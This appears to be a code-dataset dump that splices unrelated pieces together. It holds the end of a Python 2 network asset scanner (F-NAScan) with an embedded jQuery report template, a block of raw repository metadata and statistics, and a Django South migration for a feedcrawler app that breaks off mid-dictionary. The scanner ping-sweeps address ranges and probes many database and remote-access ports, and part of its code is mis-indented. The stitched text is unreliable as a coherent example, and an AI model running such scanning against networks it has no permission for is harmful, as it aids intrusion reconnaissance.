t&&(r.opacity=r.width=e),r}b.each({slideDown:ir("show"),slideUp:ir("hide"),slideToggle:ir("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){b.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),b.speed=function(e,t,n){var r=e&&"object"==typeof e?b.extend({},e):{complete:n||!n&&t||b.isFunction(e)&&e,duration:e,easing:n&&t||t&&!b.isFunction(t)&&t};return r.duration=b.fx.off?0:"number"==typeof r.duration?r.duration:r.duration in b.fx.speeds?b.fx.speeds[r.duration]:b.fx.speeds._default,(null==r.queue||r.queue===!0)&&(r.queue="fx"),r.old=r.complete,r.complete=function(){b.isFunction(r.old)&&r.old.call(this),r.queue&&b.dequeue(this,r.queue)},r},b.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2}},b.timers=[],b.fx=rr.prototype.init,b.fx.tick=function(){var e,n=b.timers,r=0;for(Xn=b.now();n.length>r;r++)e=n[r],e()||n[r]!==e||n.splice(r--,1);n.length||b.fx.stop(),Xn=t},b.fx.timer=function(e){e()&&b.timers.push(e)&&b.fx.start()},b.fx.interval=13,b.fx.start=function(){Un||(Un=setInterval(b.fx.tick,b.fx.interval))},b.fx.stop=function(){clearInterval(Un),Un=null},b.fx.speeds={slow:600,fast:200,_default:400},b.fx.step={},b.expr&&b.expr.filters&&(b.expr.filters.animated=function(e){return b.grep(b.timers,function(t){return e===t.elem}).length}),b.fn.offset=function(e){if(arguments.length)return e===t?this:this.each(function(t){b.offset.setOffset(this,e,t)});var n,r,o={top:0,left:0},a=this[0],s=a&&a.ownerDocument;if(s)return n=s.documentElement,b.contains(n,a)?(typeof a.getBoundingClientRect!==i&&(o=a.getBoundingClientRect()),r=or(s),{top:o.top+(r.pageYOffset||n.scrollTop)-(n.clientTop||0),left:o.left+(r.pageXOffset||n.scrollLeft)-(n.clientLeft||0)}):o},b.offset={setOffset:function(e,t,n){var r=b.css(e,"position");"static"===r&&(e.style.position="relative");var 
i=b(e),o=i.offset(),a=b.css(e,"top"),s=b.css(e,"left"),u=("absolute"===r||"fixed"===r)&&b.inArray("auto",[a,s])>-1,l={},c={},p,f;u?(c=i.position(),p=c.top,f=c.left):(p=parseFloat(a)||0,f=parseFloat(s)||0),b.isFunction(t)&&(t=t.call(e,n,o)),null!=t.top&&(l.top=t.top-o.top+p),null!=t.left&&(l.left=t.left-o.left+f),"using"in t?t.using.call(e,l):i.css(l)}},b.fn.extend({position:function(){if(this[0]){var e,t,n={top:0,left:0},r=this[0];return"fixed"===b.css(r,"position")?t=r.getBoundingClientRect():(e=this.offsetParent(),t=this.offset(),b.nodeName(e[0],"html")||(n=e.offset()),n.top+=b.css(e[0],"borderTopWidth",!0),n.left+=b.css(e[0],"borderLeftWidth",!0)),{top:t.top-n.top-b.css(r,"marginTop",!0),left:t.left-n.left-b.css(r,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var e=this.offsetParent||o.documentElement;while(e&&!b.nodeName(e,"html")&&"static"===b.css(e,"position"))e=e.offsetParent;return e||o.documentElement})}}),b.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,n){var r=/Y/.test(n);b.fn[e]=function(i){return b.access(this,function(e,i,o){var a=or(e);return o===t?a?n in a?a[n]:a.document.documentElement[i]:e[i]:(a?a.scrollTo(r?b(a).scrollLeft():o,r?o:b(a).scrollTop()):e[i]=o,t)},e,i,arguments.length,null)}});function or(e){return b.isWindow(e)?e:9===e.nodeType?e.defaultView||e.parentWindow:!1}b.each({Height:"height",Width:"width"},function(e,n){b.each({padding:"inner"+e,content:n,"":"outer"+e},function(r,i){b.fn[i]=function(i,o){var a=arguments.length&&(r||"boolean"!=typeof i),s=r||(i===!0||o===!0?"margin":"border");return b.access(this,function(n,r,i){var o;return b.isWindow(n)?n.document.documentElement["client"+e]:9===n.nodeType?(o=n.documentElement,Math.max(n.body["scroll"+e],o["scroll"+e],n.body["offset"+e],o["offset"+e],o["client"+e])):i===t?b.css(n,r,s):b.style(n,r,i,s)},n,a?i:t,a,null)}})}),e.jQuery=e.$=b,"function"==typeof define&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return b})})(window);
	</script>
	<script>
		function AccordionMenu(options){this.config={containerCls:".wrap-menu",menuArrs:"",type:"click",renderCallBack:null,clickItemCallBack:null};this.cache={};this.init(options)}AccordionMenu.prototype={constructor:AccordionMenu,init:function(options){this.config=$.extend(this.config,options||{});var self=this,_config=self.config,_cache=self.cache;$(_config.containerCls).each(function(index,item){self._renderHTML(item);self._bindEnv(item)})},_renderHTML:function(container){var self=this,_config=self.config,_cache=self.cache;var ulhtml=$("<ul></ul>");$(_config.menuArrs).each(function(index,item){var lihtml=$("<li><h2>"+item.name+"</h2></li>");if(item.submenu&&item.submenu.length>0){self._createSubMenu(item.submenu,lihtml)}$(ulhtml).append(lihtml)});$(container).append(ulhtml);_config.renderCallBack&&$.isFunction(_config.renderCallBack)&&_config.renderCallBack();self._levelIndent(ulhtml)},_createSubMenu:function(submenu,lihtml){var self=this,_config=self.config,_cache=self.cache;var subUl=$("<ul></ul>"),callee=arguments.callee,subLi;$(submenu).each(function(index,item){var url=item.url||"javascript:void(0)";subLi=$('<li><a href="'+url+'">'+item.name+"</a></li>");if(item.submenu&&item.submenu.length>0){$(subLi).children("a").prepend('<img 
src="data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACH/C1hNUCBEYXRhWE1QPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS4wLWMwNjAgNjEuMTM0Nzc3LCAyMDEwLzAyLzEyLTE3OjMyOjAwICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOnhtcE1NPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvbW0vIiB4bWxuczpzdFJlZj0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL3NUeXBlL1Jlc291cmNlUmVmIyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ1M1IFdpbmRvd3MiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NTRDOUU5QTc5RjAzMTFFMTk5NUZBMDVGQkVFNUU3NTIiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6NTRDOUU5QTg5RjAzMTFFMTk5NUZBMDVGQkVFNUU3NTIiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDo1NEM5RTlBNTlGMDMxMUUxOTk1RkEwNUZCRUU1RTc1MiIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDo1NEM5RTlBNjlGMDMxMUUxOTk1RkEwNUZCRUU1RTc1MiIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PgH//v38+/r5+Pf29fTz8vHw7+7t7Ovq6ejn5uXk4+Lh4N/e3dzb2tnY19bV1NPS0dDPzs3My8rJyMfGxcTDwsHAv769vLu6ubi3trW0s7KxsK+urayrqqmop6alpKOioaCfnp2cm5qZmJeWlZSTkpGQj46NjIuKiYiHhoWEg4KBgH9+fXx7enl4d3Z1dHNycXBvbm1sa2ppaGdmZWRjYmFgX15dXFtaWVhXVlVUU1JRUE9OTUxLSklIR0ZFRENCQUA/Pj08Ozo5ODc2NTQzMjEwLy4tLCsqKSgnJiUkIyIhIB8eHRwbGhkYFxYVFBMSERAPDg0MCwoJCAcGBQQDAgEAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" alt=""/>');callee(item.submenu,subLi)}$(subUl).append(subLi)});$(lihtml).append(subUl)},_levelIndent:function(ulList){var self=this,_config=self.config,_cache=self.cache,callee=arguments.callee;var 
initTextIndent=2,lev=1,$oUl=$(ulList);while($oUl.find("ul").length>0){initTextIndent=parseInt(initTextIndent,10)+2+"em";$oUl.children().children("ul").addClass("lev-"+lev).children("li").css("text-indent",initTextIndent);$oUl=$oUl.children().children("ul");lev++}$(ulList).find("ul").hide();$(ulList).find("ul:first").show()},_bindEnv:function(container){var self=this,_config=self.config;$("h2,a",container).unbind(_config.type);$("h2,a",container).bind(_config.type,function(e){if($(this).siblings("ul").length>0){$(this).siblings("ul").slideToggle("slow").end().children("img").toggleClass("unfold")}$(this).parent("li").siblings().find("ul").hide().end().find("img.unfold").removeClass("unfold");_config.clickItemCallBack&&$.isFunction(_config.clickItemCallBack)&&_config.clickItemCallBack($(this))})}};
	</script>
	</head>
	<body>
		<div class="wrap-menu">
		</div>
		<div class="wrap-data">
			<div id='result'>
			$statistics$
			</div>
		</div>
	</body>
	<script>
	var adinfo=$adinfo$;
	$(function(){
		new AccordionMenu({menuArrs:adinfo});
	});
		function view(ip){
		var data = $data$;
		try{
			$("#result").html("<pre>" + decodeURIComponent(data[ip]) + "</pre>");
		}catch(err){
			$("#result").html("<pre>" + unescape(data[ip]) + "</pre>");
		}
		}
	</script>
</html>")
mo_html = mo_html.replace('$adinfo$',str(json.dumps(re_json)))
mo_html = mo_html.replace('$data$',json.dumps(port_data))
mo_html = mo_html.replace('$statistics$',td_html)
result = open(ip + "-" + str(int(time.time())) + ".html","w")
result.write(mo_html)
result.close()
except Exception,e:
print 'Results output failure'
def t_join(m_count):
    """Block until the worker pool winds down.

    Polls every two seconds. Returns when the work queue is drained and
    only the main thread remains, or when the active-thread count has
    stayed stable (and below *m_count*) for more than five consecutive
    polls — a heuristic for "the workers have stalled out".
    """
    stagnant_polls = 0
    last_seen = 0
    while True:
        time.sleep(2)
        active = threading.activeCount()
        if active < m_count and active == last_seen:
            stagnant_polls += 1
        else:
            stagnant_polls = 0
        last_seen = active
        # Short-circuits exactly like the original: activeCount() is only
        # re-checked when the queue is already empty.
        drained = queue.empty() and threading.activeCount() <= 1
        if drained or stagnant_polls > 5:
            break
if __name__=="__main__":
    # Entry point of the scanner: parse CLI flags, expand the target
    # IP/port space, and fan the work out to a pool of ThreadNum workers.
    # NOTE(review): read_config / get_ip_list / get_port_list / get_ac_ip /
    # ThreadNum / queue / write_result are defined earlier in this file.
    mark_list = read_config('server_info')  # service fingerprints; presumably consumed by workers — TODO confirm
    msg = '''
Scanning a network asset information script,author:wolf@future-sec.
Usage: python F-NAScan.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10] [-n]
'''
    if len(sys.argv) < 2:
        # NOTE(review): prints usage but does not exit — execution falls
        # through to the try block with no target set.
        print msg
    try:
        options,args = getopt.getopt(sys.argv[1:],"h:p:m:t:n")
        ip = ''
        noping = False
        # Default port set scanned when -p is not supplied.
        port = '21,22,23,25,53,80,110,139,143,389,443,445,465,873,993,995,1080,1723,1433,1521,3306,3389,3690,5432,5800,5900,6379,7001,8000,8001,8080,8081,8888,9200,9300,9080,9999,11211,27017'
        m_count = 100  # worker-thread count (-m)
        for opt,arg in options:
            if opt == '-h':
                ip = arg
            elif opt == '-p':
                port = arg
            elif opt == '-m':
                m_count = int(arg)
            elif opt == '-t':
                # NOTE(review): not used in this block; presumably a
                # module-level socket timeout read elsewhere — confirm.
                timeout = int(arg)
            elif opt == '-n':
                noping = True
        if ip:
            ip_list = get_ip_list(ip)
            port_list = get_port_list(port)
            # Unless -n was given, ping-sweep first and keep only live hosts.
            if not noping:ip_list=get_ac_ip(ip_list)
            # Enqueue every (ip, port) pair as "ip:port" work items.
            for ip_str in ip_list:
                for port_int in port_list:
                    queue.put(':'.join([ip_str,port_int]))
            for i in range(m_count):
                t = ThreadNum(queue)
                t.setDaemon(True)  # don't block interpreter exit
                t.start()
            t_join(m_count)  # wait for the pool to drain
            write_result()   # emit the HTML report
    except Exception,e:
        print e
        print msg
| 390.771505
| 132,582
| 0.957425
| 1,903
| 145,367
| 72.980032
| 0.295323
| 0.000864
| 0.001037
| 0.000691
| 0.006408
| 0.003118
| 0.002556
| 0.001995
| 0.001397
| 0.000778
| 0
| 0.133243
| 0.028817
| 145,367
| 371
| 132,583
| 391.824798
| 0.850487
| 0.000427
| 0
| 0.256267
| 0
| 0.011142
| 0.919553
| 0.914736
| 0
| 1
| 0.000124
| 0
| 0
| 0
| null | null | 0.019499
| 0.002786
| null | null | 0.030641
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
038cd28a0fd1a8625604750e11f601065d12d040
| 26,618
|
py
|
Python
|
opps/feedcrawler/migrations/0001_initial.py
|
jeanmask/opps-feedcrawler
|
2be79a644f644a3f0b35555dd4b7fdb65065df3d
|
[
"MIT"
] | null | null | null |
opps/feedcrawler/migrations/0001_initial.py
|
jeanmask/opps-feedcrawler
|
2be79a644f644a3f0b35555dd4b7fdb65065df3d
|
[
"MIT"
] | null | null | null |
opps/feedcrawler/migrations/0001_initial.py
|
jeanmask/opps-feedcrawler
|
2be79a644f644a3f0b35555dd4b7fdb65065df3d
|
[
"MIT"
] | 3
|
2015-03-30T17:04:13.000Z
|
2019-06-26T12:20:12.000Z
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from django.contrib.auth import get_user_model
User = get_user_model()
class Migration(SchemaMigration):
    """South schema migration 0001: create the feedcrawler tables.

    Creates FeedType, Group, Feed, Entry and ProcessLog. Depends on the
    initial migrations of the ``images`` and ``channels`` apps because
    Feed/Entry hold foreign keys into them.
    """

    depends_on = (
        ("images", "0001_initial"),
        ("channels", "0001_initial"),
    )

    def forwards(self, orm):
        """Apply the migration: create all feedcrawler tables."""
        # Adding model 'FeedType'
        db.create_table(u'feedcrawler_feedtype', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
            ('processor', self.gf('django.db.models.fields.CharField')(default='opps.feedcrawler.processors.rss.RSSProcessor', max_length=255)),
            ('actions', self.gf('django.db.models.fields.CharField')(default='opps.feedcrawler.actions.rss.RSSActions', max_length=255)),
        ))
        db.send_create_signal(u'feedcrawler', ['FeedType'])
        # Adding model 'Group'
        db.create_table(u'feedcrawler_group', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=250)),
        ))
        db.send_create_signal(u'feedcrawler', ['Group'])
        # Adding model 'Feed'
        db.create_table(u'feedcrawler_feed', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('date_insert', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('date_update', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
            # User FK is resolved against the swappable user model captured
            # at module level via get_user_model().
            ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['%s.%s' % (User._meta.app_label, User._meta.object_name)])),
            ('site', self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['sites.Site'])),
            ('site_iid', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True, max_length=4, null=True, blank=True)),
            ('site_domain', self.gf('django.db.models.fields.CharField')(db_index=True, max_length=100, null=True, blank=True)),
            ('date_available', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, null=True, db_index=True)),
            ('published', self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True)),
            ('slug', self.gf('django.db.models.fields.SlugField')(max_length=150)),
            ('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('description', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('link', self.gf('django.db.models.fields.CharField')(max_length=2000, null=True, blank=True)),
            ('source_url', self.gf('django.db.models.fields.CharField')(max_length=255)),
            ('source_username', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
            ('source_password', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
            ('source_port', self.gf('django.db.models.fields.PositiveIntegerField')(null=True, blank=True)),
            ('source_root_folder', self.gf('django.db.models.fields.CharField')(default='/', max_length=255)),
            ('source_json_params', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('published_time', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
            ('last_polled_time', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
            ('group', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feedcrawler.Group'], null=True, blank=True)),
            ('feed_type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feedcrawler.FeedType'])),
            ('max_entries', self.gf('django.db.models.fields.PositiveIntegerField')(null=True, blank=True)),
            ('publish_entries', self.gf('django.db.models.fields.BooleanField')(default=True)),
            ('channel', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['channels.Channel'], null=True, on_delete=models.SET_NULL, blank=True)),
            ('main_image', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='feed_image', null=True, on_delete=models.SET_NULL, to=orm['images.Image'])),
        ))
        db.send_create_signal(u'feedcrawler', ['Feed'])
        # Adding model 'Entry' (multi-table child of containers.Container)
        db.create_table(u'feedcrawler_entry', (
            (u'container_ptr', self.gf('django.db.models.fields.related.OneToOneField')(to=orm['containers.Container'], unique=True, primary_key=True)),
            ('entry_feed', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feedcrawler.Feed'])),
            ('entry_title', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
            ('entry_link', self.gf('django.db.models.fields.CharField')(max_length=2000, null=True, blank=True)),
            ('entry_description', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('entry_content', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('entry_published_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('entry_pulled_time', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
            ('entry_json', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
            ('entry_category', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
            ('entry_category_code', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
            ('post_created', self.gf('django.db.models.fields.BooleanField')(default=False)),
        ))
        db.send_create_signal(u'feedcrawler', ['Entry'])
        # Adding model 'ProcessLog'
        db.create_table(u'feedcrawler_processlog', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('feed', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['feedcrawler.Feed'])),
            ('type', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
            ('text', self.gf('django.db.models.fields.CharField')(max_length=255, null=True, blank=True)),
            ('log_time', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, auto_now_add=True, blank=True)),
        ))
        db.send_create_signal(u'feedcrawler', ['ProcessLog'])

    def backwards(self, orm):
        """Revert the migration: drop all feedcrawler tables."""
        # Deleting model 'FeedType'
        db.delete_table(u'feedcrawler_feedtype')
        # Deleting model 'Group'
        db.delete_table(u'feedcrawler_group')
        # Deleting model 'Feed'
        db.delete_table(u'feedcrawler_feed')
        # Deleting model 'Entry'
        db.delete_table(u'feedcrawler_entry')
        # Deleting model 'ProcessLog'
        db.delete_table(u'feedcrawler_processlog')

    # Frozen ORM snapshot used by South to build the `orm` object passed to
    # forwards()/backwards(). Declarative data — do not edit by hand.
    models = {
        u'%s.%s' % (User._meta.app_label, User._meta.module_name): {
            'Meta': {'object_name': User.__name__},
        },
        u'auth.group': {
            'Meta': {'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
            'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
        },
        u'auth.permission': {
            'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
            'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        },
        u'channels.channel': {
            'Meta': {'ordering': "['name', 'parent__id', 'published']", 'unique_together': "(('site', 'long_slug', 'slug', 'parent'),)", 'object_name': 'Channel'},
            'date_available': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
            'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'group': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'homepage': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'include_in_main_rss': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'layout': ('django.db.models.fields.CharField', [], {'default': "'default'", 'max_length': '250', 'db_index': 'True'}),
            u'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            u'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'long_slug': ('django.db.models.fields.SlugField', [], {'max_length': '250'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
            'order': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
            'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'subchannel'", 'null': 'True', 'to': u"orm['channels.Channel']"}),
            'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            u'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'show_in_menu': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['sites.Site']"}),
            'site_domain': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'site_iid': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True', 'max_length': '4', 'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '150'}),
            u'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['%s.%s']" % (User._meta.app_label, User._meta.object_name)})
        },
        u'containers.container': {
            'Meta': {'ordering': "['-date_available']", 'unique_together': "(('site', 'child_class', 'channel_long_slug', 'slug'),)", 'object_name': 'Container'},
            'channel': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['channels.Channel']"}),
            'channel_long_slug': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '250', 'null': 'True', 'blank': 'True'}),
            'channel_name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '140', 'null': 'True', 'blank': 'True'}),
            'child_app_label': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '30', 'null': 'True', 'blank': 'True'}),
            'child_class': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '30', 'null': 'True', 'blank': 'True'}),
            'child_module': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '120', 'null': 'True', 'blank': 'True'}),
            'date_available': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
            'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'hat': ('django.db.models.fields.CharField', [], {'max_length': '140', 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'images': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['images.Image']", 'null': 'True', 'through': u"orm['containers.ContainerImage']", 'blank': 'True'}),
            'main_image': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'containers_container_mainimage'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['images.Image']"}),
            'main_image_caption': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'polymorphic_ctype': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'polymorphic_containers.container_set'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
            'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
            'show_on_root_channel': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['sites.Site']"}),
            'site_domain': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'site_iid': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True', 'max_length': '4', 'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '150'}),
            'source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'tags': ('django.db.models.fields.CharField', [], {'max_length': '4000', 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'db_index': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['%s.%s']" % (User._meta.app_label, User._meta.object_name)})
        },
        u'containers.containerimage': {
            'Meta': {'ordering': "('order',)", 'object_name': 'ContainerImage'},
            'caption': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'container': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['containers.Container']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'image': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['images.Image']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
            'order': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
        },
        u'contenttypes.contenttype': {
            'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
            'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
        },
        u'feedcrawler.entry': {
            'Meta': {'ordering': "['-entry_published_time']", 'object_name': 'Entry', '_ormbases': [u'containers.Container']},
            u'container_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['containers.Container']", 'unique': 'True', 'primary_key': 'True'}),
            'entry_category': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'entry_category_code': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'entry_content': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'entry_description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'entry_feed': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feedcrawler.Feed']"}),
            'entry_json': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'entry_link': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
            'entry_published_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'entry_pulled_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'entry_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'post_created': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
        },
        u'feedcrawler.feed': {
            'Meta': {'ordering': "['title']", 'object_name': 'Feed'},
            'channel': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['channels.Channel']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
            'date_available': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
            'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
